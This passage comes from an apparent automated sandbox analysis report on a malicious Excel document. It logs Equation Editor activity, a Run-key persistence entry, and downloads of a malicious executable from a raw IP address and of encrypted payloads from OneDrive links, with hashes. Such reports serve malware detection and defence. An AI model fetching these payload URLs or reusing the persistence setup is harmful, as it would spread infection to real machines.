                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .xlsx
                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                            • Attach to Office via COM
                                                            • Scroll down
                                                            • Close Viewer
                                                            Warnings:
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                            • TCP Packets have been reduced to 100
                                                            • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
                                                            • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, odc-am-files-geo.onedrive.akadns.net, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-am-files-brs.onedrive.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

Time | Type | Description
19:33:44 | API Interceptor | 80x Sleep call for process: EQNEDT32.EXE modified
19:33:48 | API Interceptor | 587x Sleep call for process: vbc.exe modified
19:34:07 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Odhbljup C:\Users\user\pujlbhdO.url
19:34:15 | API Interceptor | 43x Sleep call for process: explorer.exe modified
19:34:15 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Odhbljup C:\Users\user\pujlbhdO.url
19:34:17 | API Interceptor | 830x Sleep call for process: Odhbljup.exe modified
19:34:31 | API Interceptor | 393x Sleep call for process: NAPSTAT.EXE modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            No context

                                                            ASN

                                                            No context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\Odhbljupmsgjmlbgxyicvyabvfcycds[1]
                                                            Process:C:\Users\Public\vbc.exe
                                                            File Type:data
                                                            Category:downloaded
                                                            Size (bytes):278016
                                                            Entropy (8bit):7.9963922288524625
                                                            Encrypted:true
                                                            SSDEEP:6144:eTwehIUcAIlXb/77XeTvK42sBZ6Q/cnb1kTpm+BxOH:e/IxAIV7KvlBZ6Tnb1eeH
                                                            MD5:A8E5DCC8482C82EE2689930961F1420B
                                                            SHA1:D072977890DFA9AE598851F02C6BBEE38A1DC148
                                                            SHA-256:1E3AE3EFA50C86B73A8A24E087439BEFEBC092D41C4EF5403A1AE8280743F6FA
                                                            SHA-512:14EEA9CB96DFAEFB6DDBF72FDE3B9056EC47B9CC4A5405DCE6E94B163C6B834F9AED248DE22FC49877B3291ECC18DCCB8C650BC39DC285B547897B51CF4AE19C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            IE Cache URL:https://prigmg.am.files.1drv.com/y4mqjjzWO8S-4gOMPNZjROyLuecmLMO_yUlIbF8EkCZOGaN9ucABdXCb_4exrao8vW7SsdUDPYpqkQh6Qqxi_N7DAoaf-27vfOwTOjD2u8zZQRSud1donxrj3Bo0v4zba-Nblr6IN73XhNmJP4r3l1tAu1YAYUCe58vQZtbJlquPWfZ3jOuy9JcQZEGbfRIzBZTBjyRuE3emBp0OCwjUlkVJA/Odhbljupmsgjmlbgxyicvyabvfcycds?download&psid=1
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\Odhbljupmsgjmlbgxyicvyabvfcycds[2]
                                                            Process:C:\Users\user\Odhbljup.exe
                                                            File Type:Unknown
                                                            Category:downloaded
                                                            Size (bytes):278016
                                                            Entropy (8bit):7.9963922288524625
                                                            Encrypted:true
                                                            SSDEEP:6144:eTwehIUcAIlXb/77XeTvK42sBZ6Q/cnb1kTpm+BxOH:e/IxAIV7KvlBZ6Tnb1eeH
                                                            MD5:A8E5DCC8482C82EE2689930961F1420B
                                                            SHA1:D072977890DFA9AE598851F02C6BBEE38A1DC148
                                                            SHA-256:1E3AE3EFA50C86B73A8A24E087439BEFEBC092D41C4EF5403A1AE8280743F6FA
                                                            SHA-512:14EEA9CB96DFAEFB6DDBF72FDE3B9056EC47B9CC4A5405DCE6E94B163C6B834F9AED248DE22FC49877B3291ECC18DCCB8C650BC39DC285B547897B51CF4AE19C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            IE Cache URL:https://prigmg.am.files.1drv.com/y4m9SBOIUxawOhwOZhh5deC4xaZ_2WCiFbi3hl9ePAj_m8CsSqrvlgtSA9G3KkJWzjMT7rhB3lcxn5fapS1legu1d_b62boEcHWAGTolFMNdZO0v0w5UkQrq9shua22xERvBMGmlDDcuMm3EaPsRhJ08xfBCCD5AQ0sEM11Afhm0IuzrtQpykq8MJbhU7vdW17etwFnuWWY0Nla3J7LeEOiQw/Odhbljupmsgjmlbgxyicvyabvfcycds?download&psid=1
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Odhbljupmsgjmlbgxyicvyabvfcycds[1]
                                                            Process:C:\Users\user\Odhbljup.exe
                                                            File Type:data
                                                            Category:downloaded
                                                            Size (bytes):278016
                                                            Entropy (8bit):7.9963922288524625
                                                            Encrypted:true
                                                            SSDEEP:6144:eTwehIUcAIlXb/77XeTvK42sBZ6Q/cnb1kTpm+BxOH:e/IxAIV7KvlBZ6Tnb1eeH
                                                            MD5:A8E5DCC8482C82EE2689930961F1420B
                                                            SHA1:D072977890DFA9AE598851F02C6BBEE38A1DC148
                                                            SHA-256:1E3AE3EFA50C86B73A8A24E087439BEFEBC092D41C4EF5403A1AE8280743F6FA
                                                            SHA-512:14EEA9CB96DFAEFB6DDBF72FDE3B9056EC47B9CC4A5405DCE6E94B163C6B834F9AED248DE22FC49877B3291ECC18DCCB8C650BC39DC285B547897B51CF4AE19C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            IE Cache URL:https://prigmg.am.files.1drv.com/y4mKZQXzf28B81dJ-MfvbsWq3O9fiJ_FrJOHEXztBJ7efPunEYAY4xPt8U0ZuEifQsjz2psFPkdIQ4H6SncPfhXwYszaB5tap86Fpn7PyraqKBWdEGxvl5eVTHaE5d831FCegMtQjHfebo3Q1J_hMtaL-nMgYyAV6UdD7K2HBpOGpa5sg29qYvKnOVAYxIRd-YAH_1xRHBESXJ9PMVn2BJdJg/Odhbljupmsgjmlbgxyicvyabvfcycds?download&psid=1
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:downloaded
                                                            Size (bytes):697856
                                                            Entropy (8bit):6.715864202909051
                                                            Encrypted:false
                                                            SSDEEP:12288:CIEpAb3iVUYfqUe+L7JMlbv7fkg48BcFcePyaW:CI8G3DYfq9+hMNTMz8Cbm
                                                            MD5:3A9AE96D1F6404FCCF5BD99B7C5C0383
                                                            SHA1:2D0444EF8FE64348EEE4D748B0528E3799D18304
                                                            SHA-256:B8AA3A9C721EAE2745F1671B70869A8E3FE847A16E769D69C40727857BA54B44
                                                            SHA-512:09205202F7CAB90141485DC55C9134E4438508DD78C4484E0212708CA2782F5C8431FD8044F38718146EB9D63A6C80FCFEB1F8B8BBEA1512C859463483C9FF10
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 36%
                                                            Reputation:unknown
                                                            IE Cache URL:http://13.250.31.113/7009/binso.exe
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10F6923B.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):68702
                                                            Entropy (8bit):7.960564589117156
                                                            Encrypted:false
                                                            SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                                            MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                                            SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                                            SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                                            SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1119DDB7.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):6364
                                                            Entropy (8bit):7.935202367366306
                                                            Encrypted:false
                                                            SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                                            MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                                            SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                                            SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                                            SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19552301.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):19408
                                                            Entropy (8bit):7.931403681362504
                                                            Encrypted:false
                                                            SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                                            MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                                            SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                                            SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                                            SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\437E7858.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):19408
                                                            Entropy (8bit):7.931403681362504
                                                            Encrypted:false
                                                            SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                                            MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                                            SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                                            SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                                            SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EC276A2.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):42465
                                                            Entropy (8bit):7.979580180885764
                                                            Encrypted:false
                                                            SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                                            MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                                            SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                                            SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                                            SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6037F43A.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):68702
                                                            Entropy (8bit):7.960564589117156
                                                            Encrypted:false
                                                            SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                                            MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                                            SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                                            SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                                            SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\628BEF00.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):14828
                                                            Entropy (8bit):7.9434227607871355
                                                            Encrypted:false
                                                            SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                                            MD5:58DD6AF7C438B638A88D107CC87009C7
                                                            SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                                            SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                                            SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7D082F3.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):14828
                                                            Entropy (8bit):7.9434227607871355
                                                            Encrypted:false
                                                            SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                                            MD5:58DD6AF7C438B638A88D107CC87009C7
                                                            SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                                            SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                                            SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86E287DD.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):42465
                                                            Entropy (8bit):7.979580180885764
                                                            Encrypted:false
                                                            SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                                            MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                                            SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                                            SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                                            SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A05E2D0E.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):11303
                                                            Entropy (8bit):7.909402464702408
                                                            Encrypted:false
                                                            SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                            MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                            SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                            SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                            SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A766E4F6.emf
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                            Category:dropped
                                                            Size (bytes):498420
                                                            Entropy (8bit):0.6411554016081152
                                                            Encrypted:false
                                                            SSDEEP:384:BgfXXwBkNWZ3cJuUvmWnTG+W4D68ddxzsFfW3:BOXwBkNWZ3cjvmWa+VD7
                                                            MD5:7310A627F7793EEE1EAB78907ECAB185
                                                            SHA1:21662BC1B328E9D971A16D689878430312B9D71A
                                                            SHA-256:690B8CE7E92B9276762FB2405B45E537A8326F2949DA3630B56A4ABDECB270E5
                                                            SHA-512:DA34AC876E49D03F13747AA042ECA89D001C340A9C916809D5868ABD7E2BA158EFAD29C46DF7A0C7A8DFFD756856A401176310A66151DAD919527625581607F0
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD1EF474.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):6364
                                                            Entropy (8bit):7.935202367366306
                                                            Encrypted:false
                                                            SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                                            MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                                            SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                                            SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                                            SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3862C4C.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):10202
                                                            Entropy (8bit):7.870143202588524
                                                            Encrypted:false
                                                            SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                            MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                            SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                            SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                            SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB79A47F.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):11303
                                                            Entropy (8bit):7.909402464702408
                                                            Encrypted:false
                                                            SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                            MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                            SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                            SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                            SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF4CA1E5.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):10202
                                                            Entropy (8bit):7.870143202588524
                                                            Encrypted:false
                                                            SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                            MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                            SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                            SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                            SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Temp\~DF6138EF3239C89CAA.TMP
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            C:\Users\user\AppData\Local\Temp\~DFDD0AA16FA1AF46B3.TMP
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\~DFEF1C1027FB9769E7.TMP
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):512
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\Local\Temp\~DFFB7AE34A177A8EA8.TMP
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:CDFV2 Encrypted
                                                            Category:dropped
                                                            Size (bytes):234248
                                                            Entropy (8bit):7.971035071890227
                                                            Encrypted:false
                                                            SSDEEP:6144:X4Har3eEPWQ9luDUtOh8xcx6iGWegiwrjsYLnXt:X4+TPWQ9Mx6gRiwrjrt
                                                            MD5:8305DC6702F80D7EBE34CD8C63297561
                                                            SHA1:DB055CCE075213D510DE5CA9044EA76036DBCD07
                                                            SHA-256:9EAE576F7ECC05F106A7CFA605B1CA5BCD02C8D1C2C926920C0D7F0CB605B345
                                                            SHA-512:4B79BCB14665FD34D42979E0364480FF2A9050D7700DB3226393F5764350D3689B80431901BF275A80C60CF4D2BE5E013FD2AB2DE4D629A5EE826491C432B5EF
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\1020B0BE.txt
                                                            Process:C:\Users\user\Odhbljup.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):4.093292485947682
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2Lecw9zy/WVmxn:vEMWXLDwIe0n
                                                            MD5:ABD12F1C0B4E39B1BF5214FCD2A5AAAA
                                                            SHA1:DB75BD2BCF4EC9A53639CE6D5406DEEEFCFBC759
                                                            SHA-256:7F4C58DAE173EBFB0AC54F30037DE30C76188E758648E05B72755A9CA94C9C28
                                                            SHA-512:0F009E151266630E9268615E368D796B1D9B5D6B8EF197A3F359D7E934D1C194E36C07B7DA760D851A2CDE6111533531F777CEC91D8E29255F5239FE6DB8B452
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: wla42..live.com/.1536.1789904384.30928171.1592555332.30926839.*.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NPAI0NCY.txt
                                                            Process:C:\Users\user\Odhbljup.exe
                                                            File Type:Unknown
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):4.107301813326428
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2ESRWj9z6VcBn:vEMWXdWjrn
                                                            MD5:829EBDA80C973BEC9588898598992144
                                                            SHA1:FA0E07B5AAE0FB38E78D7F2843CC71B3B3159628
                                                            SHA-256:4B8AD7C735D6EDFF81FCDC15D0A0920EE4F25AEBA4C43CB62DB50FCC9E6B6C75
                                                            SHA-512:B98AAB1FF375056566FA5A01B41E7EB8C798C4646392B73B03B45AB8CF9153C011B328D2529BC10B7E039596A933896CF634CB30B123E6B58D78B34080DD193C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: wla42..live.com/.1536.1879904384.30928171.1682686095.30926839.*.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\OG4AVE13.txt
                                                            Process:C:\Users\user\Odhbljup.exe
                                                            File Type:Unknown
                                                            Category:downloaded
